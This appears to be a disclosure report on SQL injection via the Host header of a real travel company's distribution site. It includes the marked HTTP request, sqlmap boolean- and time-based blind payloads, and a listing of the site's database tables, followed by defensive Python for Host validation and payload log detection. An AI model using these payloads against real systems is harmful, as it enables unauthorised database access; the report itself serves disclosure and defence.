2015-07-06: Details sent to the vendor; awaiting vendor handling
2015-07-06: Vendor confirmed; details disclosed to the vendor only
2015-07-16: Details disclosed to core white hats and relevant domain experts
2015-07-26: Details disclosed to regular white hats
2015-08-05: Details disclosed to intern white hats
2015-08-20: Details disclosed to the public

SQL injection via an HTTP header on an important Lvmama platform
http://fenxiao.lvmama.com/
GET / HTTP/1.1
Host: fenxiao.lvmama.com*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fenxiao.lvmama.com/home/index.jsp
Cookie: JSESSIONID=eS5SEMyyrred
Connection: keep-alive

Host parameter, 19 databases:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Host (Host)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: -5437' OR 5236=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(68)||CHR(106),5) AND 'CZop'='CZop
---
web application technology: Apache
back-end DBMS: Oracle
Database: SAAS0
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| MLOG$_B2B_TICKET_DETAIL     | 794489  |
| MLOG$_ROOM_INFO             | 739820  |
| SYS_SMS_LOG                 | 632524  |
| MLOG$_INFO_NEWS             | 599452  |
| MLOG$_INFO_TICKET_PRICE     | 513239  |
| SITE_IP2                    | 403384  |
| MLOG$_INFO_TICKET_RELVIEW   | 371299  |
| MLOG$_INFO_HOTEL            | 297430  |
| USR_ENTERPRISE_TAG          | 279279  |
| MLOG$_SAAS_USER_INFO1       | 250810  |
| SAAS_VIEW_SUB               | 220785  |
| CRUEL_CODE_LOG              | 211624  |
| USR_VIEW_MSG                | 197004  |
| CUST_BALANCE_LOG            | 174868  |
| ROOM_INFO                   | 149771  |
| INFO_BANK_TMP               | 126068  |
| INFO_BANK                   | 117283  |
| MLOG$_USR_VIEW              | 102701  |
| MLOG$_INFO_TICKET_COND      | 94586   |
| USR_VIEW                    | 85337   |
| INTERFACE_HOTEL_SET         | 68054   |
| INTERFACE_QUNAR_LOG         | 67402   |
| USR_VIEW_COPY               | 65389   |
| CRUEL_CODE_LIST             | 62173   |
| INTERFACE_IMAGECO           | 61732   |
| CRUEL_CODE_MESSAGE          | 61445   |
| HOTEL_INFO                  | 60710   |
| MLOG$_INFO_TICKET_DETAIL    | 54829   |
| T_LANDMARK                  | 51918   |
| INTERFACE_FZG_HOTEL         | 35793   |
| T_VENUE_SUB                 | 27718   |
| JP_INFO_FLIGHT              | 25133   |
| T_VENUE                     | 24033   |
| EXPCODE_DETAIL              | 23496   |
| INTERFACE_SUPPLY_SYNC_LOG   | 17963   |
| CRUEL_CODE_VERIFY           | 14197   |
| MLOG$_SAAS_USER_INFO        | 13659   |
| MLOG$_USR_VIEW1             | 12552   |
| MLOG$_INFO_TRAVEL           | 12419   |
| MLOG$_INFO_TICKET_RELAREA   | 12241   |
| TB_RECEIVE_LOG              | 12138   |
| BANK_CITYCODE               | 11293   |
| AUDIT_INFO                  | 10611   |
| SAAS_PAY_DRAWMONEY          | 8870    |
| TB_CONSUME_CODE             | 8680    |
| INFO_AREA                   | 8416    |
| INFO_AREA_EX                | 8389    |
| INTERFACE_HOTEL             | 8256    |
| INFO_CAR_TYPE               | 7354    |
| MLOG$_INFO_CONDS            | 7249    |
| SAAS_USER_INFO_LOG          | 5012    |
| INTERFACE_LONG              | 4900    |
| USR_VIEW_COLUMN             | 4780    |
| USR_MSG                     | 4164    |
| T_REGIONS_QD                | 3891    |
| TEMP_LTJL_AREA_INFO         | 3469    |
| ALITRIP_COUNTRY             | 3330    |
| TEMP_SYR_AREA_INFO          | 3252    |
| T_REGIONS                   | 3207    |
| INTERFACE_QUNAR_MOVE        | 2666    |
| HOTEL_DISTRICT              | 2598    |
| SAAS_VAP_ORDER              | 2571    |
| MLOG$_INFO_CAR              | 2500    |
| SAAS_PAY_DRAWMONEY_LOG      | 2480    |
| MLOG$_TB_USR_INFO1          | 2450    |
| SAAS_INFO_AREA              | 2247    |
| USR_VIEW_LINK               | 2191    |
| INTERFACE_FZG_BIZZONE       | 1999    |
| MLOG$_INFO_VISA             | 1782    |
| ALITRIP_ROOMTYPE222         | 1189    |
| RECE_PAYMENT_LIST           | 1018    |
| TB_USR_INFO                 | 1007    |
| JP_INFO_AIRPORT             | 940     |
| SAAS_ORDER_CHANNEL          | 939     |
| USR_VIEW_MSG_HIS            | 935     |
| T_REGIONS_SUBWAY            | 928     |
| INFO_VISA_SORT              | 874     |
| INTERFACE_LLK_CODE          | 843     |
| SAAS_USER_INFO              | 843     |
| MLOG$_HOTEL_INFO1           | 773     |
| USR_VIEW_NAV                | 752     |
| B2C_TAOBAO_LOG              | 515     |
| T_VENUE_COUNT               | 497     |
| INTERFACE_MTS_LOG           | 468     |
| ONLINE_DEBUG_LOG            | 457     |
| USR_VIEW_PAGE               | 441     |
| INTERFACE_USER_SET          | 434     |
| MLOG$_INFO_TICKET_CANCEL    | 351     |
| SAAS_PERMISSION             | 346     |
| INTERFACE_USER_SET_LOG      | 316     |
| SAAS_BUY_LOG                | 313     |
| INTERFACE_LUOHUSHAN_LOG     | 310     |
| SAAS_AREA_SUB               | 307     |
| USR_PAGES                   | 303     |
| ALITRIP_HOTEL222            | 294     |
| WX_SET                      | 269     |
| INTERFACE_QUNAR_HOTEL_LOG   | 229     |
| JP_INFO_AIRWAYS             | 221     |
| T_SPORTTYPE                 | 213     |
| USR_TAG                     | 202     |
| MLOG$_HOTEL_DISTRICT1       | 199     |
| SAAS_INFO_SUB               | 179     |
| SAAS_PAY_SET                | 171     |
| CUST_INFO_GROUP_CHANNEL     | 128     |
| SAAS_NEWS                   | 121     |
| SAAS_SERVICE_ADD_LOG        | 116     |
| SYS_MENU                    | 113     |
| CRUEL_CODE_POS              | 103     |
| INTERFACE_QUNAR             | 100     |
| HOTEL_BRAND                 | 97      |
| SMSINTERFACE_SET_LOG        | 94      |
| TB_VIEW_INFO                | 89      |
| INTERFACE_INFO              | 86      |
| EXPCODE_LIST                | 82      |
| B2C_TAOBAO_ORDER            | 68      |
| SAAS_SERVICE                | 58      |
| USR_POWER_AREA              | 58      |
| B2C_TAOBAO_PRODUCT          | 54      |
| UNIONPAY_TRADE_LOG          | 49      |
| B2C_TAOBAO_ORDER_LOG        | 40      |
| SAAS_USER_MEMO              | 39      |
| CRUEL_CODE_CUST             | 36      |
| T_VENUE_RECORD              | 35      |
| INTERFACE_MAP               | 33      |
| SAAS_ORDER_SOURCE           | 33      |
| INTERFACE_TICKET            | 32      |
| USR_LOGIN                   | 32      |
| SYS_CURRENCY_RATE           | 25      |
| MLOG$_SAAS_PERMISSION1      | 23      |
| SMS_CONSUME_LOG             | 23      |
| SAAS_NEWS_SORT              | 19      |
| SAAS_CLUSTER                | 17      |
| CRUEL_EXP_LIST              | 15      |
| INTERFACE_QUNAR_HOTEL       | 15      |
| JP_INFO_PLANE               | 15      |
| INTERFACE_IMAGECO_CUST      | 11      |
| INTERFACE_LLK_CUST          | 10      |
| SAAS_PAY_SERVICE            | 10      |
| USR_VIEW_TEMPLATE           | 10      |
| SAAS_PAY_PRODUCT_TYPE       | 9       |
| SMSINTERFACE_INFO           | 9       |
| SAAS_VAP_PRODUCT            | 8       |
| SMSINTERFACE_USER_SET       | 8       |
| B2C_TAOBAO_NOTIFYRECEIVEMSG | 7       |
| INTERFACE_MEITUAN           | 7       |
| MLOG$_INTERFACE_LLK_CUST    | 7       |
| MLOG$_USR_ENTERPRISE_TAG    | 7       |
| SAAS_PROD_TYPE              | 6       |
| SAAS_TABLE_SQL              | 6       |
| SAAS_AGENT_INFO             | 5       |
| SMS_GETMONEY_LOG            | 5       |
| USR_INFO                    | 5       |
| BAIDU_TICKET_INFO           | 4       |
| INTERFACE_MTS               | 4       |
| WX_TEMP_INFO                | 4       |
| B2B_SETTLE_METHOD           | 3       |
| INTERFACE_PIAOGJ            | 3       |
| SAAS_MESSAGE_ADDIN          | 3       |
| SAAS_MESSAGE_RSS            | 3       |
| B2C_TAOBAO_CONFIG           | 2       |
| BAIDU_TICKET_VIEW           | 2       |
| CRUEL_EXP_CODE              | 2       |
| SAAS_NOTICE                 | 2       |
| TMP_USR_VIEW                | 2       |
| UNIONPAY_CONFIG             | 2       |
| INTERFACE_PRICE_RULE        | 1       |
| MLOG$_INFO_PROD             | 1       |
| SAAS_MONITORING             | 1       |
| T_VENUE_PRICE               | 1       |
+-----------------------------+---------+
Not going any deeper~
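The injectable value here is the Host header, which many applications treat as trusted input and never validate. As an added example (not part of the original report, and not Lvmama's code, which the report does not show), the Python below demonstrates the two controls a defender would want for this class of bug: strict Host validation against an allowlist before the value can reach any query, and a log scanner that flags the two sqlmap payload shapes shown in the output above. The allowlist, the Apache LogFormat with a trailing "%{Host}i" field, and the sample log lines are constructed assumptions for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed allowlist: the hostnames this application is meant to serve.
# Assumption for this example; the real deployment's list is not on the page.
ALLOWED_HOSTS = {"fenxiao.lvmama.com"}

# RFC 1123 hostname labels: letters, digits and hyphens, 1-63 chars each,
# no leading or trailing hyphen. Quotes, spaces and SQL keywords can never pass.
_LABELS_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def is_valid_host(host: str) -> bool:
    """Hardened check: syntax first, then an exact allowlist match.

    Apply this to the Host header before the value is used anywhere,
    and in particular before it can be concatenated into a query.
    """
    name, _, port = host.partition(":")
    if port and not (port.isdigit() and 0 < int(port) <= 65535):
        return False
    if not (0 < len(name) <= 253) or not _LABELS_RE.match(name):
        return False
    return name.lower() in ALLOWED_HOSTS


# Signatures for the two payload shapes in the sqlmap output above.
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("boolean-based blind: quote + AND/OR + N=N",
     re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)),
    ("Oracle time-based blind: DBMS_PIPE.RECEIVE_MESSAGE(",
     re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.IGNORECASE)),
    ("tautology tail: 'x'='x",
     re.compile(r"'(\w+)'\s*=\s*'\1\b", re.IGNORECASE)),
]

# Assumed Apache LogFormat: the combined format plus a trailing "%{Host}i"
# field (the default combined format does not record the Host header at all).
_LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" \d+ \S+ "[^"]*" "[^"]*" "(.*)"$'
)


@dataclass
class Finding:
    ip: str
    time: str
    host: str
    valid_host: bool
    signatures: List[str] = field(default_factory=list)


def scan_log(text: str) -> List[Finding]:
    """Flag requests whose Host header is malformed or matches a known payload."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format; a real scanner would count these
        ip, ts, host = m.groups()
        hits = [name for name, rx in SIGNATURES if rx.search(host)]
        valid = is_valid_host(host)
        if hits or not valid:
            findings.append(Finding(ip, ts, host, valid, hits))
    return findings


# Constructed sample lines: the two injected Host values are the payload
# strings sqlmap reported above, the other two are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2015:12:58:01 +0800] "GET / HTTP/1.1" 200 5123 "http://fenxiao.lvmama.com/home/index.jsp" "Mozilla/5.0" "fenxiao.lvmama.com"
10.0.0.5 - - [06/Jul/2015:12:58:02 +0800] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0" "fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ"
10.0.0.5 - - [06/Jul/2015:12:58:09 +0800] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0" "-5437' OR 5236=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(68)||CHR(106),5) AND 'CZop'='CZop"
10.0.0.7 - - [06/Jul/2015:12:58:10 +0800] "GET /home/index.jsp HTTP/1.1" 200 8800 "-" "Mozilla/5.0" "fenxiao.lvmama.com:80"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.time} {f.ip} valid_host={f.valid_host} {f.signatures}")
        print(f"    Host: {f.host}")
```

The syntax check alone would already have rejected both payloads, since a legitimate Host value can never contain a quote or a space; the allowlist additionally stops Host-header attacks that use a well-formed but foreign hostname. The signature list is deliberately narrow (it mirrors the two techniques sqlmap reported here), so in practice it complements, rather than replaces, the validity check: anything that fails `is_valid_host` is flagged even when no signature matches.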
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-07-06 13:03
Thanks
None yet